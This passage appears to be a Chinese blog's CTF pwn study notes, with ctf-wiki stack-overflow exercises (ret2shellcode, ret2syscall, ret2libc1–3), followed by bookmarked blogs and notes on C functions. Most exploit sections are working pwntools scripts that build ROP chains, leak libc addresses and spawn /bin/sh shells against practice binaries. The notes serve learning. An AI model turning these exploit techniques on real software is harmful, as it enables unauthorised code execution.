class="line">    <span class="comment">#利用asm(shellcraft.sh())生成shellcode</span></span><br><span class="line">    <span class="comment">#shellcode.ljust(112, &#x27;A&#x27;)将shellcode填充为112个字符长度的字符串</span></span><br><span class="line">    <span class="comment">#注：ljust()用于字符串填充</span></span><br></pre></td></tr></table></figure>

<br/>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#解题脚本如下：</span></span><br><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">&#x27;./ret2shellcode&#x27;</span>)</span><br><span class="line">shellcode = asm(shellcraft.sh())</span><br><span class="line">buf2_addr = 0x804a080</span><br><span class="line"></span><br><span class="line">sh.sendline(shellcode.ljust(112, <span class="string">&#x27;A&#x27;</span>) + p32(buf2_addr))</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<br/>

<br/>

<h4 id="ret2syscall"><a href="#ret2syscall" class="headerlink" title="ret2syscall"></a>ret2syscall</h4><p>知识点：系统调用、寻找 gadgets 的方法</p>
<p>原文链接: <a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#ret2syscall">ctf-wiki-ret2syscall</a></p>
<p>点击下载: <a target="_blank" rel="noopener" href="https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2syscall/bamboofox-ret2syscall/rop">ret2syscall</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#知识点补充</span></span><br><span class="line">系统调用：</span><br><span class="line">	int 0x80进入内核模式（与之对应的是用户模式），进入内核模式后，</span><br><span class="line">	系统会根据相应寄存器的值判定要进行什么样的系统调用</span><br><span class="line"></span><br><span class="line">例：</span><br><span class="line">这里就对ctf-wiki上的execve(<span class="string">&quot;/bin/sh&quot;</span>,NULL,NULL)例子进行更通俗的解释：</span><br><span class="line">若在执行int 0x80前做到以下三点，就相当于执行了execve(<span class="string">&quot;/bin/sh&quot;</span>,NULL,NULL)指令</span><br><span class="line">	eax的值变为0xb</span><br><span class="line">	ebx的值为/bin/sh的地址</span><br><span class="line">	ecx和edx的值变为0</span><br><span class="line">	</span><br><span class="line">注：一般eax存储系统调用号，从以上的例子也可以看出</span><br><span class="line">	ebx、ecx、edx分别存储<span class="string">&quot;/bin/sh&quot;</span>,NULL,NULL三个参数</span><br></pre></td></tr></table></figure>

<br/>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">解题步骤：</span><br><span class="line">1、ida分析源码</span><br><span class="line">2、gdb计算偏移，112</span><br><span class="line">3、寻找控制 eax 的 gadgets：</span><br><span class="line">      指令：ROPgadget --binary rop  --only <span class="string">&#x27;pop|ret&#x27;</span> | grep <span class="string">&#x27;eax&#x27;</span></span><br><span class="line">      选取：0x080bb196 : pop eax ; ret</span><br><span class="line">4、寻找控制其它寄存器的 gadgets</span><br><span class="line">      指令：ROPgadget --binary rop  --only <span class="string">&#x27;pop|ret&#x27;</span> | grep <span class="string">&#x27;ebx&#x27;</span></span><br><span class="line">      选取：0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret</span><br><span class="line">5、查找 /bin/sh 字符串对应的地址</span><br><span class="line">      指令：ROPgadget --binary rop  --string <span class="string">&#x27;/bin/sh&#x27;</span></span><br><span class="line">      选取：0x080be408 : /bin/sh</span><br><span class="line">6、查找 int 0x80 的地址</span><br><span class="line">      指令：ROPgadget --binary rop  --only <span class="string">&#x27;int&#x27;</span></span><br><span class="line">      选取：0x08049421 : int 0x80</span><br><span class="line">7、编写解题脚本</span><br></pre></td></tr></table></figure>

<br/>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#解题脚本如下：</span></span><br><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">&#x27;./rop&#x27;</span>)</span><br><span class="line"></span><br><span class="line">pop_eax_ret = 0x080bb196</span><br><span class="line">pop_edx_ecx_ebx_ret = 0x0806eb90</span><br><span class="line">int_0x80 = 0x08049421</span><br><span class="line">binsh = 0x80be408</span><br><span class="line">payload = flat(</span><br><span class="line">    [<span class="string">&#x27;A&#x27;</span> * 112, pop_eax_ret, 0xb, pop_edx_ecx_ebx_ret, 0, 0, binsh, int_0x80])</span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<p>注：flat()用于标准化数据，相当于将flat中的每个数据外套上p32()</p>
<p>注：栈上数据的跳转实现，有空模拟一下</p>
<br/>

<br/>

<h4 id="ret2libc"><a href="#ret2libc" class="headerlink" title="ret2libc"></a>ret2libc</h4><p>__不可错过的一篇博客：__<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_40827990/article/details/86662079">https://blog.csdn.net/qq_40827990/article/details/86662079</a></p>
<br/>

<h5 id="例1：ret2libc1"><a href="#例1：ret2libc1" class="headerlink" title="例1：ret2libc1"></a>例1：ret2libc1</h5><p>知识点：system 函数与 /bin/sh 字符串分离，栈分析</p>
<p>原文链接：<a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#ret2libc">ctf-wiki-ret2libc</a></p>
<p>点击下载：<a target="_blank" rel="noopener" href="https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2libc/ret2libc1/ret2libc1">ret2libc1</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">#解题脚本</span><br><span class="line">#!/usr/bin/env python</span><br><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">sh = process(&#x27;./ret2libc1&#x27;)</span><br><span class="line"></span><br><span class="line">binsh_addr = 0x8048720</span><br><span class="line">system_plt = 0x08048460</span><br><span class="line">payload = flat([&#x27;a&#x27; * 112, system_plt, &#x27;b&#x27; * 4, binsh_addr])</span><br><span class="line">sh.sendline(payload)</span><br><span class="line"></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<br/>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#解题步骤：</span></span><br><span class="line">payload = flat([<span class="string">&#x27;a&#x27;</span> * 112, system_plt, <span class="string">&#x27;b&#x27;</span> * 4, binsh_addr])</span><br><span class="line">主要是搞懂中间为什么要隔4个字符，执行完每步汇编后栈上的值的情况怎样</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">push    <span class="comment">#先减esp，再压入</span></span><br><span class="line">pop     <span class="comment">#先取数据再增esp</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">函数头：</span><br><span class="line">	push   ebp              <span class="comment">#esp下移四个字节(32位寄存器大小)，</span></span><br><span class="line">                            <span class="comment">#上一栈帧ebp值入栈</span></span><br><span class="line">							</span><br><span class="line">	mov    ebp,esp          <span class="comment">#esp值赋给ebp，即将ebp指向esp位置</span></span><br><span class="line">	</span><br><span class="line">	and    esp,FFFFFFF0h    <span class="comment">#esp加一个极大值，溢出部分忽略，</span></span><br><span class="line">                            <span class="comment">#相当于减了一个F，即esp下移F个位置</span></span><br><span class="line"></span><br><span class="line">函数尾：</span><br><span class="line">	leave：等价于</span><br><span class="line">		mov    esp,ebp</span><br><span class="line">		</span><br><span class="line">		pop    ebp          <span class="comment">#取出esp指向的栈位置处的数据赋给ebp，</span></span><br><span class="line">                            <span class="comment">#再将esp上移四个字节</span></span><br><span class="line"></span><br><span class="line">	retn:</span><br><span class="line">		pop    eip          <span class="comment">#取出esp指向的栈位置处的数据赋给eip，</span></span><br><span class="line">                            <span class="comment">#再将esp上移四个字节</span></span><br><span class="line">							</span><br><span class="line">		jmp    eip          <span class="comment">#跳转到eip寄存器中存储的地址</span></span><br><span class="line">		</span><br><span class="line">		</span><br><span class="line">所以我们可以看到，一个函数尾，会先从栈上取一个值赋给esp再取一个值赋给eip，</span><br><span class="line">结合下方图片记录，好好理一遍，应该就能搞懂中间为什么要隔4个字符了。</span><br></pre></td></tr></table></figure>



<p>图片记录(.\PWN\ )：</p>
<p><img src="image-20220321212743720.png" alt="image-20220321212743720"></p>
<p><img src="image-20220321212728076.png" alt="image-20220321212728076"></p>
<p><img src="image-20220321212714333.png" alt="image-20220321212714333"></p>
<p><img src="image-20220321212317869.png" alt="image-20220321212317869"></p>
<p><img src="image-20220321212258169.png" alt="image-20220321212258169"></p>
<br/>

<br/>

<hr>
<hr>
<hr>
<h5 id="例2：ret2libc2"><a href="#例2：ret2libc2" class="headerlink" title="例2：ret2libc2"></a>例2：ret2libc2</h5><p>知识点：got表、plt表</p>
<p>原文链接：<a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#2">ctf-wiki-ret2libc2</a></p>
<p>点击下载：<a target="_blank" rel="noopener" href="https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2libc/ret2libc2/ret2libc2">ret2libc2</a></p>
<h5 id="例3：ret2libc3"><a href="#例3：ret2libc3" class="headerlink" title="例3：ret2libc3"></a>例3：ret2libc3</h5><p>原文链接：<a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#3">ctf-wiki-ret2libc3</a></p>
<p>点击下载：<a target="_blank" rel="noopener" href="https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2libc/ret2libc3/ret2libc3">ret2libc3</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#LibcSearcher的安装</span></span><br><span class="line">    $ git <span class="built_in">clone</span> https://github.com/lieanu/LibcSearcher.git</span><br><span class="line">    $ <span class="built_in">cd</span> LibcSearcher</span><br><span class="line">    $ python setup.py develop</span><br></pre></td></tr></table></figure>

<p>推荐题解：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_40827990/article/details/86662079">https://blog.csdn.net/qq_40827990/article/details/86662079</a></p>
<p>解题思路：</p>
<ul>
<li>泄露 __libc_start_main 地址</li>
<li>获取 libc 版本</li>
<li>获取 system 地址与 /bin/sh 的地址</li>
<li>再次执行源程序</li>
<li>触发栈溢出执行 system(‘/bin/sh’)</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#导入模块</span></span><br><span class="line">from pwn import *</span><br><span class="line">from LibcSearcher import LibcSearcher</span><br><span class="line"></span><br><span class="line"><span class="comment">#启动程序</span></span><br><span class="line">p = process(<span class="string">&#x27;./ret2libc3&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 打印调试信息</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span>          </span><br><span class="line"></span><br><span class="line"><span class="comment">#记录地址</span></span><br><span class="line">start_addr = 0x80484d0</span><br><span class="line">puts_plt_addr = 0x8048460</span><br><span class="line">libc_start_main_got_addr = 0x804a024</span><br><span class="line"></span><br><span class="line"><span class="comment">#遇到指定字符串暂停程序</span></span><br><span class="line">p.recvuntil(<span class="string">&#x27;Can you find it !?&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#发送数据</span></span><br><span class="line">p.sendline(<span class="string">&#x27;q&#x27;</span>*112 + p32(puts_plt_addr) + p32(start_addr) + p32(libc_start_main_got_addr))</span><br><span class="line"></span><br><span class="line"><span class="comment">#接收函数地址</span></span><br><span class="line">libc_start_main_addr = u32(p.recv(4))</span><br><span class="line"></span><br><span class="line"><span class="comment">#打印 __libc_start_main_addr: 初始地址</span></span><br><span class="line"><span class="built_in">print</span> <span class="string">&quot;__libc_start_main_addr: &quot;</span> + hex(libc_start_main_addr)</span><br><span class="line"></span><br><span class="line"><span class="comment">#查找使用的libc版本</span></span><br><span class="line">libc = LibcSearcher(<span class="string">&#x27;__libc_start_main&#x27;</span>, libc_start_main_addr)</span><br><span class="line"></span><br><span class="line"><span class="comment">#计算偏移值</span></span><br><span class="line">libcbase = libc_start_main_addr - libc.dump(<span class="string">&#x27;__libc_start_main&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#计算system函数地址</span></span><br><span class="line">system_addr = libcbase + libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#计算/bin/sh字符串地址</span></span><br><span class="line">binsh_addr = libcbase + libc.dump(<span class="string">&#x27;str_bin_sh&#x27;</span>) + 0xb9</span><br><span class="line"></span><br><span class="line"><span class="comment">#两个打印语句，显示相应地址</span></span><br><span class="line"><span class="built_in">print</span> <span class="string">&quot;system_addr: &quot;</span> + hex(system_addr)</span><br><span class="line"><span class="built_in">print</span> <span class="string">&quot;binsh_addr: &quot;</span> + hex(binsh_addr)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&#x27;Can you find it !?&#x27;</span>)</span><br><span class="line">p.sendline(<span class="string">&#x27;s&#x27;</span>*112 + p32(system_addr) + <span class="string">&#x27;aaaa&#x27;</span> + p32(binsh_addr))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>



<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#导入模块</span></span><br><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line">sh = process(<span class="string">&#x27;./ret2libc3&#x27;</span>)</span><br><span class="line"></span><br><span class="line">ret2libc3 = ELF(<span class="string">&#x27;./ret2libc3&#x27;</span>)</span><br><span class="line"></span><br><span class="line">puts_plt = ret2libc3.plt[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">libc_start_main_got = ret2libc3.got[<span class="string">&#x27;__libc_start_main&#x27;</span>]</span><br><span class="line">main = ret2libc3.symbols[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> <span class="string">&quot;leak libc_start_main_got addr and return to main again&quot;</span></span><br><span class="line">payload = flat([<span class="string">&#x27;A&#x27;</span> * <span class="number">112</span>, puts_plt, main, libc_start_main_got])</span><br><span class="line">sh.sendlineafter(<span class="string">&#x27;Can you find it !?&#x27;</span>, payload)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> <span class="string">&quot;get the related addr&quot;</span></span><br><span class="line">libc_start_main_addr = u32(sh.recv()[<span class="number">0</span>:<span class="number">4</span>])</span><br><span class="line">libc = LibcSearcher(<span class="string">&#x27;__libc_start_main&#x27;</span>, libc_start_main_addr)</span><br><span class="line">libcbase = libc_start_main_addr - libc.dump(<span class="string">&#x27;__libc_start_main&#x27;</span>)</span><br><span class="line">system_addr = libcbase + libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line">binsh_addr = libcbase + libc.dump(<span class="string">&#x27;str_bin_sh&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> <span class="string">&quot;get shell&quot;</span></span><br><span class="line">payload = flat([<span class="string">&#x27;A&#x27;</span> * <span class="number">104</span>, system_addr, <span class="number">0xdeadbeef</span>, binsh_addr])</span><br><span class="line">sh.sendline(payload)</span><br><span class="line"></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>







<p>链接（查询libc版本）：<a target="_blank" rel="noopener" href="https://libc.blukat.me/">https://libc.blukat.me/</a></p>
<br/>

<br/>

<p>———————————————————————-分界线———————————————————————————————————–</p>
<br/>

<h1 id="博客收藏"><a href="#博客收藏" class="headerlink" title="博客收藏"></a>博客收藏</h1><p>遇到的一些好的博客，当然是要收藏一下的嘛╭( ￣ ▽￣)╯，对了，有事没事多看看别人的友链，说不定能找到一两篇宝藏博客</p>
<br/>

<p>链接(pwn新手推荐)：<a target="_blank" rel="noopener" href="https://www.yuque.com/hxfqg9/bin">二进制安全 · 语雀 (yuque.com)</a></p>
<p>链接(大佬博客)：<a target="_blank" rel="noopener" href="https://xuanxuanblingbling.github.io/">Clang裁缝店 (xuanxuanblingbling.github.io)</a></p>
<p>链接(大佬博客)：<a target="_blank" rel="noopener" href="https://blingblingxuanxuan.github.io/">blingbling’s blog (blingblingxuanxuan.github.io)</a></p>
<p>链接(大佬博客)：<a target="_blank" rel="noopener" href="https://nuoye-blog.github.io/">nuoye大佬</a></p>
<p>链接(大佬博客)：<a target="_blank" rel="noopener" href="http://uuzdaisuki.com/">http://uuzdaisuki.com/</a></p>
<p>链接(大佬博客)：<a target="_blank" rel="noopener" href="https://lantern.cool/">Lantern’s 小站</a></p>
<p>链接(大佬博客)：<a target="_blank" rel="noopener" href="http://blog.eonew.cn/">Ex’s blog (eonew.cn)</a></p>
<p>链接(大佬博客)：<a target="_blank" rel="noopener" href="https://radishes-nine.vercel.app/">Radish (radishes-nine.vercel.app)</a></p>
<p>链接(QAQ)：<a target="_blank" rel="noopener" href="https://www.anquanke.com/member.html?memberId=134349">安全客 - 安全资讯平台 (anquanke.com)</a></p>
<p>链接(杂)：<a target="_blank" rel="noopener" href="https://toutiao.io/subjects/6127">https://toutiao.io/subjects/6127</a></p>
<p>链接(杂)：<a target="_blank" rel="noopener" href="https://toutiao.io/u/129594">https://toutiao.io/u/129594</a></p>
<br/>

<br/>

<h1 id="文章收藏"><a href="#文章收藏" class="headerlink" title="文章收藏"></a>文章收藏</h1><p>链接：<a target="_blank" rel="noopener" href="https://www.52pojie.cn/thread-1389324-1-1.html">逆向基础笔记二十四 汇编 指针（五） 系列完结 - 『软件调试区』 - 吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn</a></p>
<br/>

<br/>

<h1 id="函数"><a href="#函数" class="headerlink" title="函数"></a>函数</h1><p>链接：<a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/doc/1024">C++ - 开发者手册 - 云+社区 - 腾讯云 (tencent.com)</a></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*-- C/C++ --*/</span></span><br><span class="line"></span><br><span class="line">fgets():</span><br><span class="line">C 库函数 <span class="function"><span class="keyword">char</span> *<span class="title">fgets</span><span class="params">(<span class="keyword">char</span> *str, <span class="keyword">int</span> n, FILE *stream)</span> 从指定的流 stream 读取一行，并把它存储在 str 所指向的字符串内。当读取 <span class="params">(n<span class="number">-1</span>)</span> 个字符时，或者读取到换行符时，或者到达文件末尾时，它会停止，具体视情况而定。</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"><span class="title">fflush</span><span class="params">()</span>用于清空文件缓冲区，如果文件是以写的方式打开 的，则把缓冲区内容写入文件。其原型为：<span class="keyword">int</span> <span class="title">fflush</span><span class="params">(FILE* stream)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="built_in">memset</span>() 函数可以说是初始化内存的“万能函数”，<span class="built_in">memset</span>() 的作用是在一段内存块中填充某个给定的值。因为它只能填充一个值，所以该函数的初始化为原始初始化，无法将变量初始化为程序中需要的数据。用<span class="built_in">memset</span>初始化完后，后面程序中再向该内存空间中存放需要的数据。</span><br><span class="line">    <span class="function"><span class="keyword">void</span> *<span class="title">memset</span><span class="params">(<span class="keyword">void</span> *s, <span class="keyword">int</span> c, <span class="keyword">unsigned</span> <span class="keyword">long</span> n)</span></span>;    <span class="comment">//原型</span></span><br><span class="line">    <span class="keyword">char</span> str[<span class="number">10</span>];         <span class="comment">//例子</span></span><br><span class="line">    <span class="keyword">char</span> *p = str;</span><br><span class="line">    <span class="built_in">memset</span>(str, <span class="number">0</span>, <span class="keyword">sizeof</span>(str));  <span class="comment">//只能写sizeof(str), 不能写sizeof(p)</span></span><br><span class="line"></span><br><span class="line">setvbuf(<span class="built_in">stdin</span>, <span class="number">0LL</span>, <span class="number">2</span>, <span class="number">0LL</span>);</span><br><span class="line">setvbuf(<span class="built_in">stdout</span>, <span class="number">0LL</span>, <span class="number">2</span>, <span class="number">0LL</span>);</span><br><span class="line">setvbuf(<span class="built_in">stderr</span>, <span class="number">0LL</span>, <span class="number">2</span>, <span class="number">0LL</span>);</span><br><span class="line"><span class="comment">//可以通输入参数type=2（行缓冲）的setvbuf来使得每次从流中读入一行数据或向流中写入一行数据</span></span><br><span class="line"><span class="comment">//https://blog.csdn.net/Maxmalloc/article/details/102556335  </span></span><br><span class="line">    </span><br><span class="line"><span class="built_in">sscanf</span>()、sscanf_s()</span><br><span class="line"><span class="comment">//https://blog.csdn.net/wu_cai_/article/details/81702886</span></span><br><span class="line">    </span><br><span class="line">perror()</span><br><span class="line">链接：https:<span class="comment">//www.runoob.com/cprogramming/c-function-perror.html</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">malloc</span>()、<span class="built_in">calloc</span>()、<span class="built_in">realloc</span>()    <span class="comment">//这些函数用于从堆中动态获得一块内存</span></span><br><span class="line"></span><br><span class="line">alloca()    <span class="comment">//在栈(stack)上申请空间</span></span><br></pre></td></tr></table></figure>

<br/>

<h1 id="标记"><a href="#标记" class="headerlink" title="标记"></a>标记</h1><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">70</span>i64        <span class="comment">//64位int类型数据70</span></span><br><span class="line">_DWORD *     <span class="comment">//DWORD是无符号的,相当于unsigned long ，它是MFC的数据类型，类似于char *、int *</span></span><br></pre></td></tr></table></figure>



<br/>

<h2 id="反编译中不理解的代码"><a href="#反编译中不理解的代码" class="headerlink" title="反编译中不理解的代码"></a>反编译中不理解的代码</h2><h3 id="例1（C-）"><a href="#例1（C-）" class="headerlink" title="例1（C++）"></a>例1（C++）</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"># 得学C++</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">vuln</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">const</span> <span class="keyword">char</span> *v0; <span class="comment">// eax</span></span><br><span class="line">  <span class="keyword">char</span> s[<span class="number">32</span>]; <span class="comment">// [esp+1Ch] [ebp-3Ch] BYREF</span></span><br><span class="line">  <span class="keyword">char</span> v3[<span class="number">4</span>]; <span class="comment">// [esp+3Ch] [ebp-1Ch] BYREF</span></span><br><span class="line">  <span class="keyword">char</span> v4[<span class="number">7</span>]; <span class="comment">// [esp+40h] [ebp-18h] BYREF</span></span><br><span class="line">  <span class="keyword">char</span> v5; <span class="comment">// [esp+47h] [ebp-11h] BYREF</span></span><br><span class="line">  <span class="keyword">char</span> v6[<span class="number">7</span>]; <span class="comment">// [esp+48h] [ebp-10h] BYREF</span></span><br><span class="line">  <span class="keyword">char</span> v7[<span class="number">5</span>]; <span class="comment">// [esp+4Fh] [ebp-9h] BYREF</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;Tell me something about yourself: &quot;</span>);</span><br><span class="line">  fgets(s, <span class="number">32</span>, edata);                   <span class="comment">//从输入的字符串中读取前32个字符存入S</span></span><br><span class="line">  <span class="built_in">std</span>::<span class="built_in">string</span>::<span class="keyword">operator</span>=(&amp;input, s);</span><br><span class="line">  <span class="built_in">std</span>::allocator&lt;<span class="keyword">char</span>&gt;::allocator(&amp;v5);</span><br><span class="line">  <span class="built_in">std</span>::<span class="built_in">string</span>::<span class="built_in">string</span>(v4, <span class="string">&quot;you&quot;</span>, &amp;v5);   <span class="comment">//从v4的起始地址到v5的起始地址写入字符串“you”</span></span><br><span class="line">  <span class="built_in">std</span>::allocator&lt;<span class="keyword">char</span>&gt;::allocator(v7);</span><br><span class="line">  <span class="built_in">std</span>::<span class="built_in">string</span>::<span class="built_in">string</span>(v6, <span class="string">&quot;I&quot;</span>, v7);      <span class="comment">//从v6的起始地址到v7的起始地址写入字符串“I”</span></span><br><span class="line">  replace((<span class="built_in">std</span>::<span class="built_in">string</span> *)v3);            <span class="comment">//I 替换为you</span></span><br><span class="line">  <span class="built_in">std</span>::<span class="built_in">string</span>::<span class="keyword">operator</span>=(&amp;input, v3, v6, v4);  </span><br><span class="line">  <span class="built_in">std</span>::<span class="built_in">string</span>::~<span class="built_in">string</span>(v3);</span><br><span class="line">  <span class="built_in">std</span>::<span 